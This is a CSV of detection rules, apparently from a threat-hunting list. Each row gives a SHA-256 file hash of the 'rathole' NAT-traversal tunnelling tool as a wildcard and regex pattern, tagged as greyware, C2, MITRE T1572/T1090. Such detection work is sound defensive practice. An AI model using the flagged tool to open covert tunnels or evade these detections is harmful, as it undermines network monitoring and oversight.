"*38c02b41d5db41d58683737cb04191cdfd3b61f41d31dc14b8d68a3a141cc647*",".{0,1000}38c02b41d5db41d58683737cb04191cdfd3b61f41d31dc14b8d68a3a141cc647.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*391fd08daf4986afda1690225e4d9fed0c6d36ad1a56e4362cd8f2797e2ac93a*",".{0,1000}391fd08daf4986afda1690225e4d9fed0c6d36ad1a56e4362cd8f2797e2ac93a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*39433eab5c47e1153d8e17086402f2848b7ba868df213fce01db52a664f53d64*",".{0,1000}39433eab5c47e1153d8e17086402f2848b7ba868df213fce01db52a664f53d64.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*3a4ce767d5ff5706372f654aa5ccf01bf84d10dc87777094be635dca8869ed39*",".{0,1000}3a4ce767d5ff5706372f654aa5ccf01bf84d10dc87777094be635dca8869ed39.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*3b96ccd1383bbd60d1b79867f5ed32bd15778b94399fb891c3172ea02516ccb1*",".{0,1000}3b96ccd1383bbd60d1b79867f5ed32bd15778b94399fb891c3172ea02516ccb1.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*3bbd5d43f581b39aa84a88d801f48506ab3105b7f958ea718556b4faa4564c0f*",".{0,1000}3bbd5d43f581b39aa84a88d801f48506ab3105b7f958ea718556b4faa4564c0f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*3dc341f1a1daa80084699b292d0493012a3a85a5cbc157f6984c04def0d2dce7*",".{0,1000}3dc341f1a1daa80084699b292d0493012a3a85a5cbc157f6984c04def0d2dce7.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*3e7d0d0f365120cd3cd351d147d1a12ee960c8068b464d4dd533a3821873b80e*",".{0,1000}3e7d0d0f365120cd3cd351d147d1a12ee960c8068b464d4dd533a3821873b80e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*3f04e968871c818880aa23cecc9239651b7e550a625d655236690af22ea2bbdc*",".{0,1000}3f04e968871c818880aa23cecc9239651b7e550a625d655236690af22ea2bbdc.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*3fad6d60c83b9bce3ca61da5ef4cd799d91e6c1f17db783ebd515953c392cd4a*",".{0,1000}3fad6d60c83b9bce3ca61da5ef4cd799d91e6c1f17db783ebd515953c392cd4a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*40fa588b18db010c3b2826ea38be66a2894f95e284682caf14bc8894b16c4cae*",".{0,1000}40fa588b18db010c3b2826ea38be66a2894f95e284682caf14bc8894b16c4cae.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*427b5beef3af730379ab66c28fe12f192768f4aebcd24e02f540feee952d001f*",".{0,1000}427b5beef3af730379ab66c28fe12f192768f4aebcd24e02f540feee952d001f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*42850266bcac0528664c59738c32ba234582c70ffa0326b35c79612914961740*",".{0,1000}42850266bcac0528664c59738c32ba234582c70ffa0326b35c79612914961740.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*43486a6363b656d155d759db8a67e2e7264c38984c9ffa2d7449dfb085ad009d*",".{0,1000}43486a6363b656d155d759db8a67e2e7264c38984c9ffa2d7449dfb085ad009d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*45f654720ebb2583ea767c849f3ac197e386c6a8dd0015db4084603da6c9ae8b*",".{0,1000}45f654720ebb2583ea767c849f3ac197e386c6a8dd0015db4084603da6c9ae8b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*46813eb8d4d50118f67087792670db2b8efdef414c6d3134ad474f1e6856c704*",".{0,1000}46813eb8d4d50118f67087792670db2b8efdef414c6d3134ad474f1e6856c704.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*4684afc644880a2ba1b92c512ed3d4e5c653236d370e069b13065b1af878fe5c*",".{0,1000}4684afc644880a2ba1b92c512ed3d4e5c653236d370e069b13065b1af878fe5c.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*469b789cfedcb5d0c3ffd47a4fb4666f38e582b56fb75efb21e38de4b23d8e9b*",".{0,1000}469b789cfedcb5d0c3ffd47a4fb4666f38e582b56fb75efb21e38de4b23d8e9b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*46c6e992b3552d3672c40e7a91ecfb6f9b4620199cf2b5d1dd11cfccd44fa4b0*",".{0,1000}46c6e992b3552d3672c40e7a91ecfb6f9b4620199cf2b5d1dd11cfccd44fa4b0.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*4721c0b58d6421bff09d13ade097f71af24d0752c2a9d69021f53e2726c76b5b*",".{0,1000}4721c0b58d6421bff09d13ade097f71af24d0752c2a9d69021f53e2726c76b5b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*482e5f220835c0ed0bad7c5823a7aab0e3c04fbe020d13f403400ddb368ab705*",".{0,1000}482e5f220835c0ed0bad7c5823a7aab0e3c04fbe020d13f403400ddb368ab705.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*48a3b1707d22b65890d7feae45f45dff52faa7234ea5fb6f8c738eb0ad265246*",".{0,1000}48a3b1707d22b65890d7feae45f45dff52faa7234ea5fb6f8c738eb0ad265246.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*48c45f037e2d32fa7f55d0c1e9957bba8cf9bce467437c389c5630d00dd46e10*",".{0,1000}48c45f037e2d32fa7f55d0c1e9957bba8cf9bce467437c389c5630d00dd46e10.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*4babb86918876772a6370e0e08a2640186971a1124728616289a9bda68ddc434*",".{0,1000}4babb86918876772a6370e0e08a2640186971a1124728616289a9bda68ddc434.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*4be299e6a3466a6306d4ead72959aafa4a6c05618ddabc47d67dd0efd34281d7*",".{0,1000}4be299e6a3466a6306d4ead72959aafa4a6c05618ddabc47d67dd0efd34281d7.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*4bf8d88abad30daff8751a1c3a82769901969db2691ba8047cca09641410fca3*",".{0,1000}4bf8d88abad30daff8751a1c3a82769901969db2691ba8047cca09641410fca3.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*4fb15611c3facf046b2f52178d939e5c7b9fbba79320bd0329e129c4f179cd3d*",".{0,1000}4fb15611c3facf046b2f52178d939e5c7b9fbba79320bd0329e129c4f179cd3d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*5041dad585a35ab841cf44028ee5318b61ce73b97f2ff90757a8ce609e620a63*",".{0,1000}5041dad585a35ab841cf44028ee5318b61ce73b97f2ff90757a8ce609e620a63.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*507fb6f358381291fe987336263b35ab8c49b42abfa44f4b3f159b92ac54c521*",".{0,1000}507fb6f358381291fe987336263b35ab8c49b42abfa44f4b3f159b92ac54c521.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*51fffad6f5e6f4a431c08cc28c25297e62f85f97dca246fecb6f3c5d3ca22cbb*",".{0,1000}51fffad6f5e6f4a431c08cc28c25297e62f85f97dca246fecb6f3c5d3ca22cbb.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*5252ae734d3bc191efdb95074830509a7ae4293fa25ce866b9fe35c455e61058*",".{0,1000}5252ae734d3bc191efdb95074830509a7ae4293fa25ce866b9fe35c455e61058.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*53afadaca917c0192ff3c2bae061516c6b14e6befe1d2d5c0cbb5f96de2eb74b*",".{0,1000}53afadaca917c0192ff3c2bae061516c6b14e6befe1d2d5c0cbb5f96de2eb74b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*5852511a70f384dcf32e29b3ec2f3d10d2704fdaae504d07d3876a887ca05cf4*",".{0,1000}5852511a70f384dcf32e29b3ec2f3d10d2704fdaae504d07d3876a887ca05cf4.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*589f0861ae990113c24fed3527dc6b15d3b9108bfbda358ed10503800820508a*",".{0,1000}589f0861ae990113c24fed3527dc6b15d3b9108bfbda358ed10503800820508a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*58cea3ee018d8f72239d639b012df07d9b0d22e49ecbe2522461db439643fb11*",".{0,1000}58cea3ee018d8f72239d639b012df07d9b0d22e49ecbe2522461db439643fb11.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*58edc63c43a77b5d217b081b9597824ff4831de52ce2491bcff4c62ce6888e2f*",".{0,1000}58edc63c43a77b5d217b081b9597824ff4831de52ce2491bcff4c62ce6888e2f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*5a7cd4fcf7cecb7d346af8e28b49ad66c43d5bb34610485dde2210cadba3d8c2*",".{0,1000}5a7cd4fcf7cecb7d346af8e28b49ad66c43d5bb34610485dde2210cadba3d8c2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*5b3ae3dde66a377dec786323215a45d10f55ada626d29a2890d2f4915111b7a7*",".{0,1000}5b3ae3dde66a377dec786323215a45d10f55ada626d29a2890d2f4915111b7a7.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*5b65d6f452aacc65b9282a842c5c327bf27bb92c11d73ed5466ba29f582bea07*",".{0,1000}5b65d6f452aacc65b9282a842c5c327bf27bb92c11d73ed5466ba29f582bea07.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*5c470be4bbc5ffc24dfbde00aba320a8eb66a4bd2889a02e4e97a5c12117e061*",".{0,1000}5c470be4bbc5ffc24dfbde00aba320a8eb66a4bd2889a02e4e97a5c12117e061.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*5f9832e49d35fa40dd007cdb3cdddfea38ea63079cce124a01b43d7b47d4c6be*",".{0,1000}5f9832e49d35fa40dd007cdb3cdddfea38ea63079cce124a01b43d7b47d4c6be.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*6130adcd3415141a87525d6a511d996d1b17afd3f9876e48b36f866c86a9f7c6*",".{0,1000}6130adcd3415141a87525d6a511d996d1b17afd3f9876e48b36f866c86a9f7c6.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*6133e8d04f789d3810b1c9fe24b0454ee821d809bae82e26642baa6f7a5312b6*",".{0,1000}6133e8d04f789d3810b1c9fe24b0454ee821d809bae82e26642baa6f7a5312b6.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*62fe7d29d8b013efa5b599313a50713b285473514819ed4b427d910211c53d24*",".{0,1000}62fe7d29d8b013efa5b599313a50713b285473514819ed4b427d910211c53d24.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*661ff1a84f0413f062b672be7ffccad36357290c76646715887689e3524e2b48*",".{0,1000}661ff1a84f0413f062b672be7ffccad36357290c76646715887689e3524e2b48.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*6680fa302838dad7262ebe0dc33c2f954d74552021062e3dc1f20993038e54bc*",".{0,1000}6680fa302838dad7262ebe0dc33c2f954d74552021062e3dc1f20993038e54bc.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*669d5f76c3456565a231a907aee6c2887a8835638a023cbded6c7bdaa306fbe5*",".{0,1000}669d5f76c3456565a231a907aee6c2887a8835638a023cbded6c7bdaa306fbe5.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*68c3320fc6aac048a90bbbbe7e066df33a9ad43831fe27101130627e1180565d*",".{0,1000}68c3320fc6aac048a90bbbbe7e066df33a9ad43831fe27101130627e1180565d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*68d84e43220ca8a2245f37422e8499710529197cfa599ee2174049c83fd68898*",".{0,1000}68d84e43220ca8a2245f37422e8499710529197cfa599ee2174049c83fd68898.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*6988f41ce97bebcfae509ed20ba95dc1a7148dcafdfb7c58452088d6d6d74df4*",".{0,1000}6988f41ce97bebcfae509ed20ba95dc1a7148dcafdfb7c58452088d6d6d74df4.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*6b994027ecb764471cdcf3d547532203e4fcbe55fd68ad04a5f9881b56fce399*",".{0,1000}6b994027ecb764471cdcf3d547532203e4fcbe55fd68ad04a5f9881b56fce399.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*6c511d6c053f8958c718d4374289b25457d4d426c0215c5eba3616f77c6f65bb*",".{0,1000}6c511d6c053f8958c718d4374289b25457d4d426c0215c5eba3616f77c6f65bb.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*6c8386af326a7123f12bff56f737a825e52564e9f142862cbd88653fc5b841b7*",".{0,1000}6c8386af326a7123f12bff56f737a825e52564e9f142862cbd88653fc5b841b7.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*6d01bb9b786da4013f55f0fe29dfb7490cede245414db1bac43fb204aad2c97c*",".{0,1000}6d01bb9b786da4013f55f0fe29dfb7490cede245414db1bac43fb204aad2c97c.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*6d686399731d32af0783b096717c5a14fdbe74e1e432ee2e8fdaace36ebbbe3d*",".{0,1000}6d686399731d32af0783b096717c5a14fdbe74e1e432ee2e8fdaace36ebbbe3d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*6e2966ff6488fa05ed5ffb24ae5dde4fe1954b3006aa0269510ac9feaf099c78*",".{0,1000}6e2966ff6488fa05ed5ffb24ae5dde4fe1954b3006aa0269510ac9feaf099c78.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*6e8b78647d756a84e7662d42955224fe17bcea674ff125ba1e63b0737ceaebe1*",".{0,1000}6e8b78647d756a84e7662d42955224fe17bcea674ff125ba1e63b0737ceaebe1.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*701fd0ae9d88d3a08c418e9d0fca6651c058b7eef8fb34194acf753bfd80e221*",".{0,1000}701fd0ae9d88d3a08c418e9d0fca6651c058b7eef8fb34194acf753bfd80e221.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*711795b31d4482d7f7ce181b00db2ce2a33d3d7675f1d9feab0e984b017d2178*",".{0,1000}711795b31d4482d7f7ce181b00db2ce2a33d3d7675f1d9feab0e984b017d2178.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*726996a84c8ef0f3c50ecbab6842c5679c38f73f2dd7d0c7f7b4dec5411daee3*",".{0,1000}726996a84c8ef0f3c50ecbab6842c5679c38f73f2dd7d0c7f7b4dec5411daee3.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*735a96908571fa623b9d4065a3061deaa897e5140724fc3dcb620bdd6679b516*",".{0,1000}735a96908571fa623b9d4065a3061deaa897e5140724fc3dcb620bdd6679b516.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
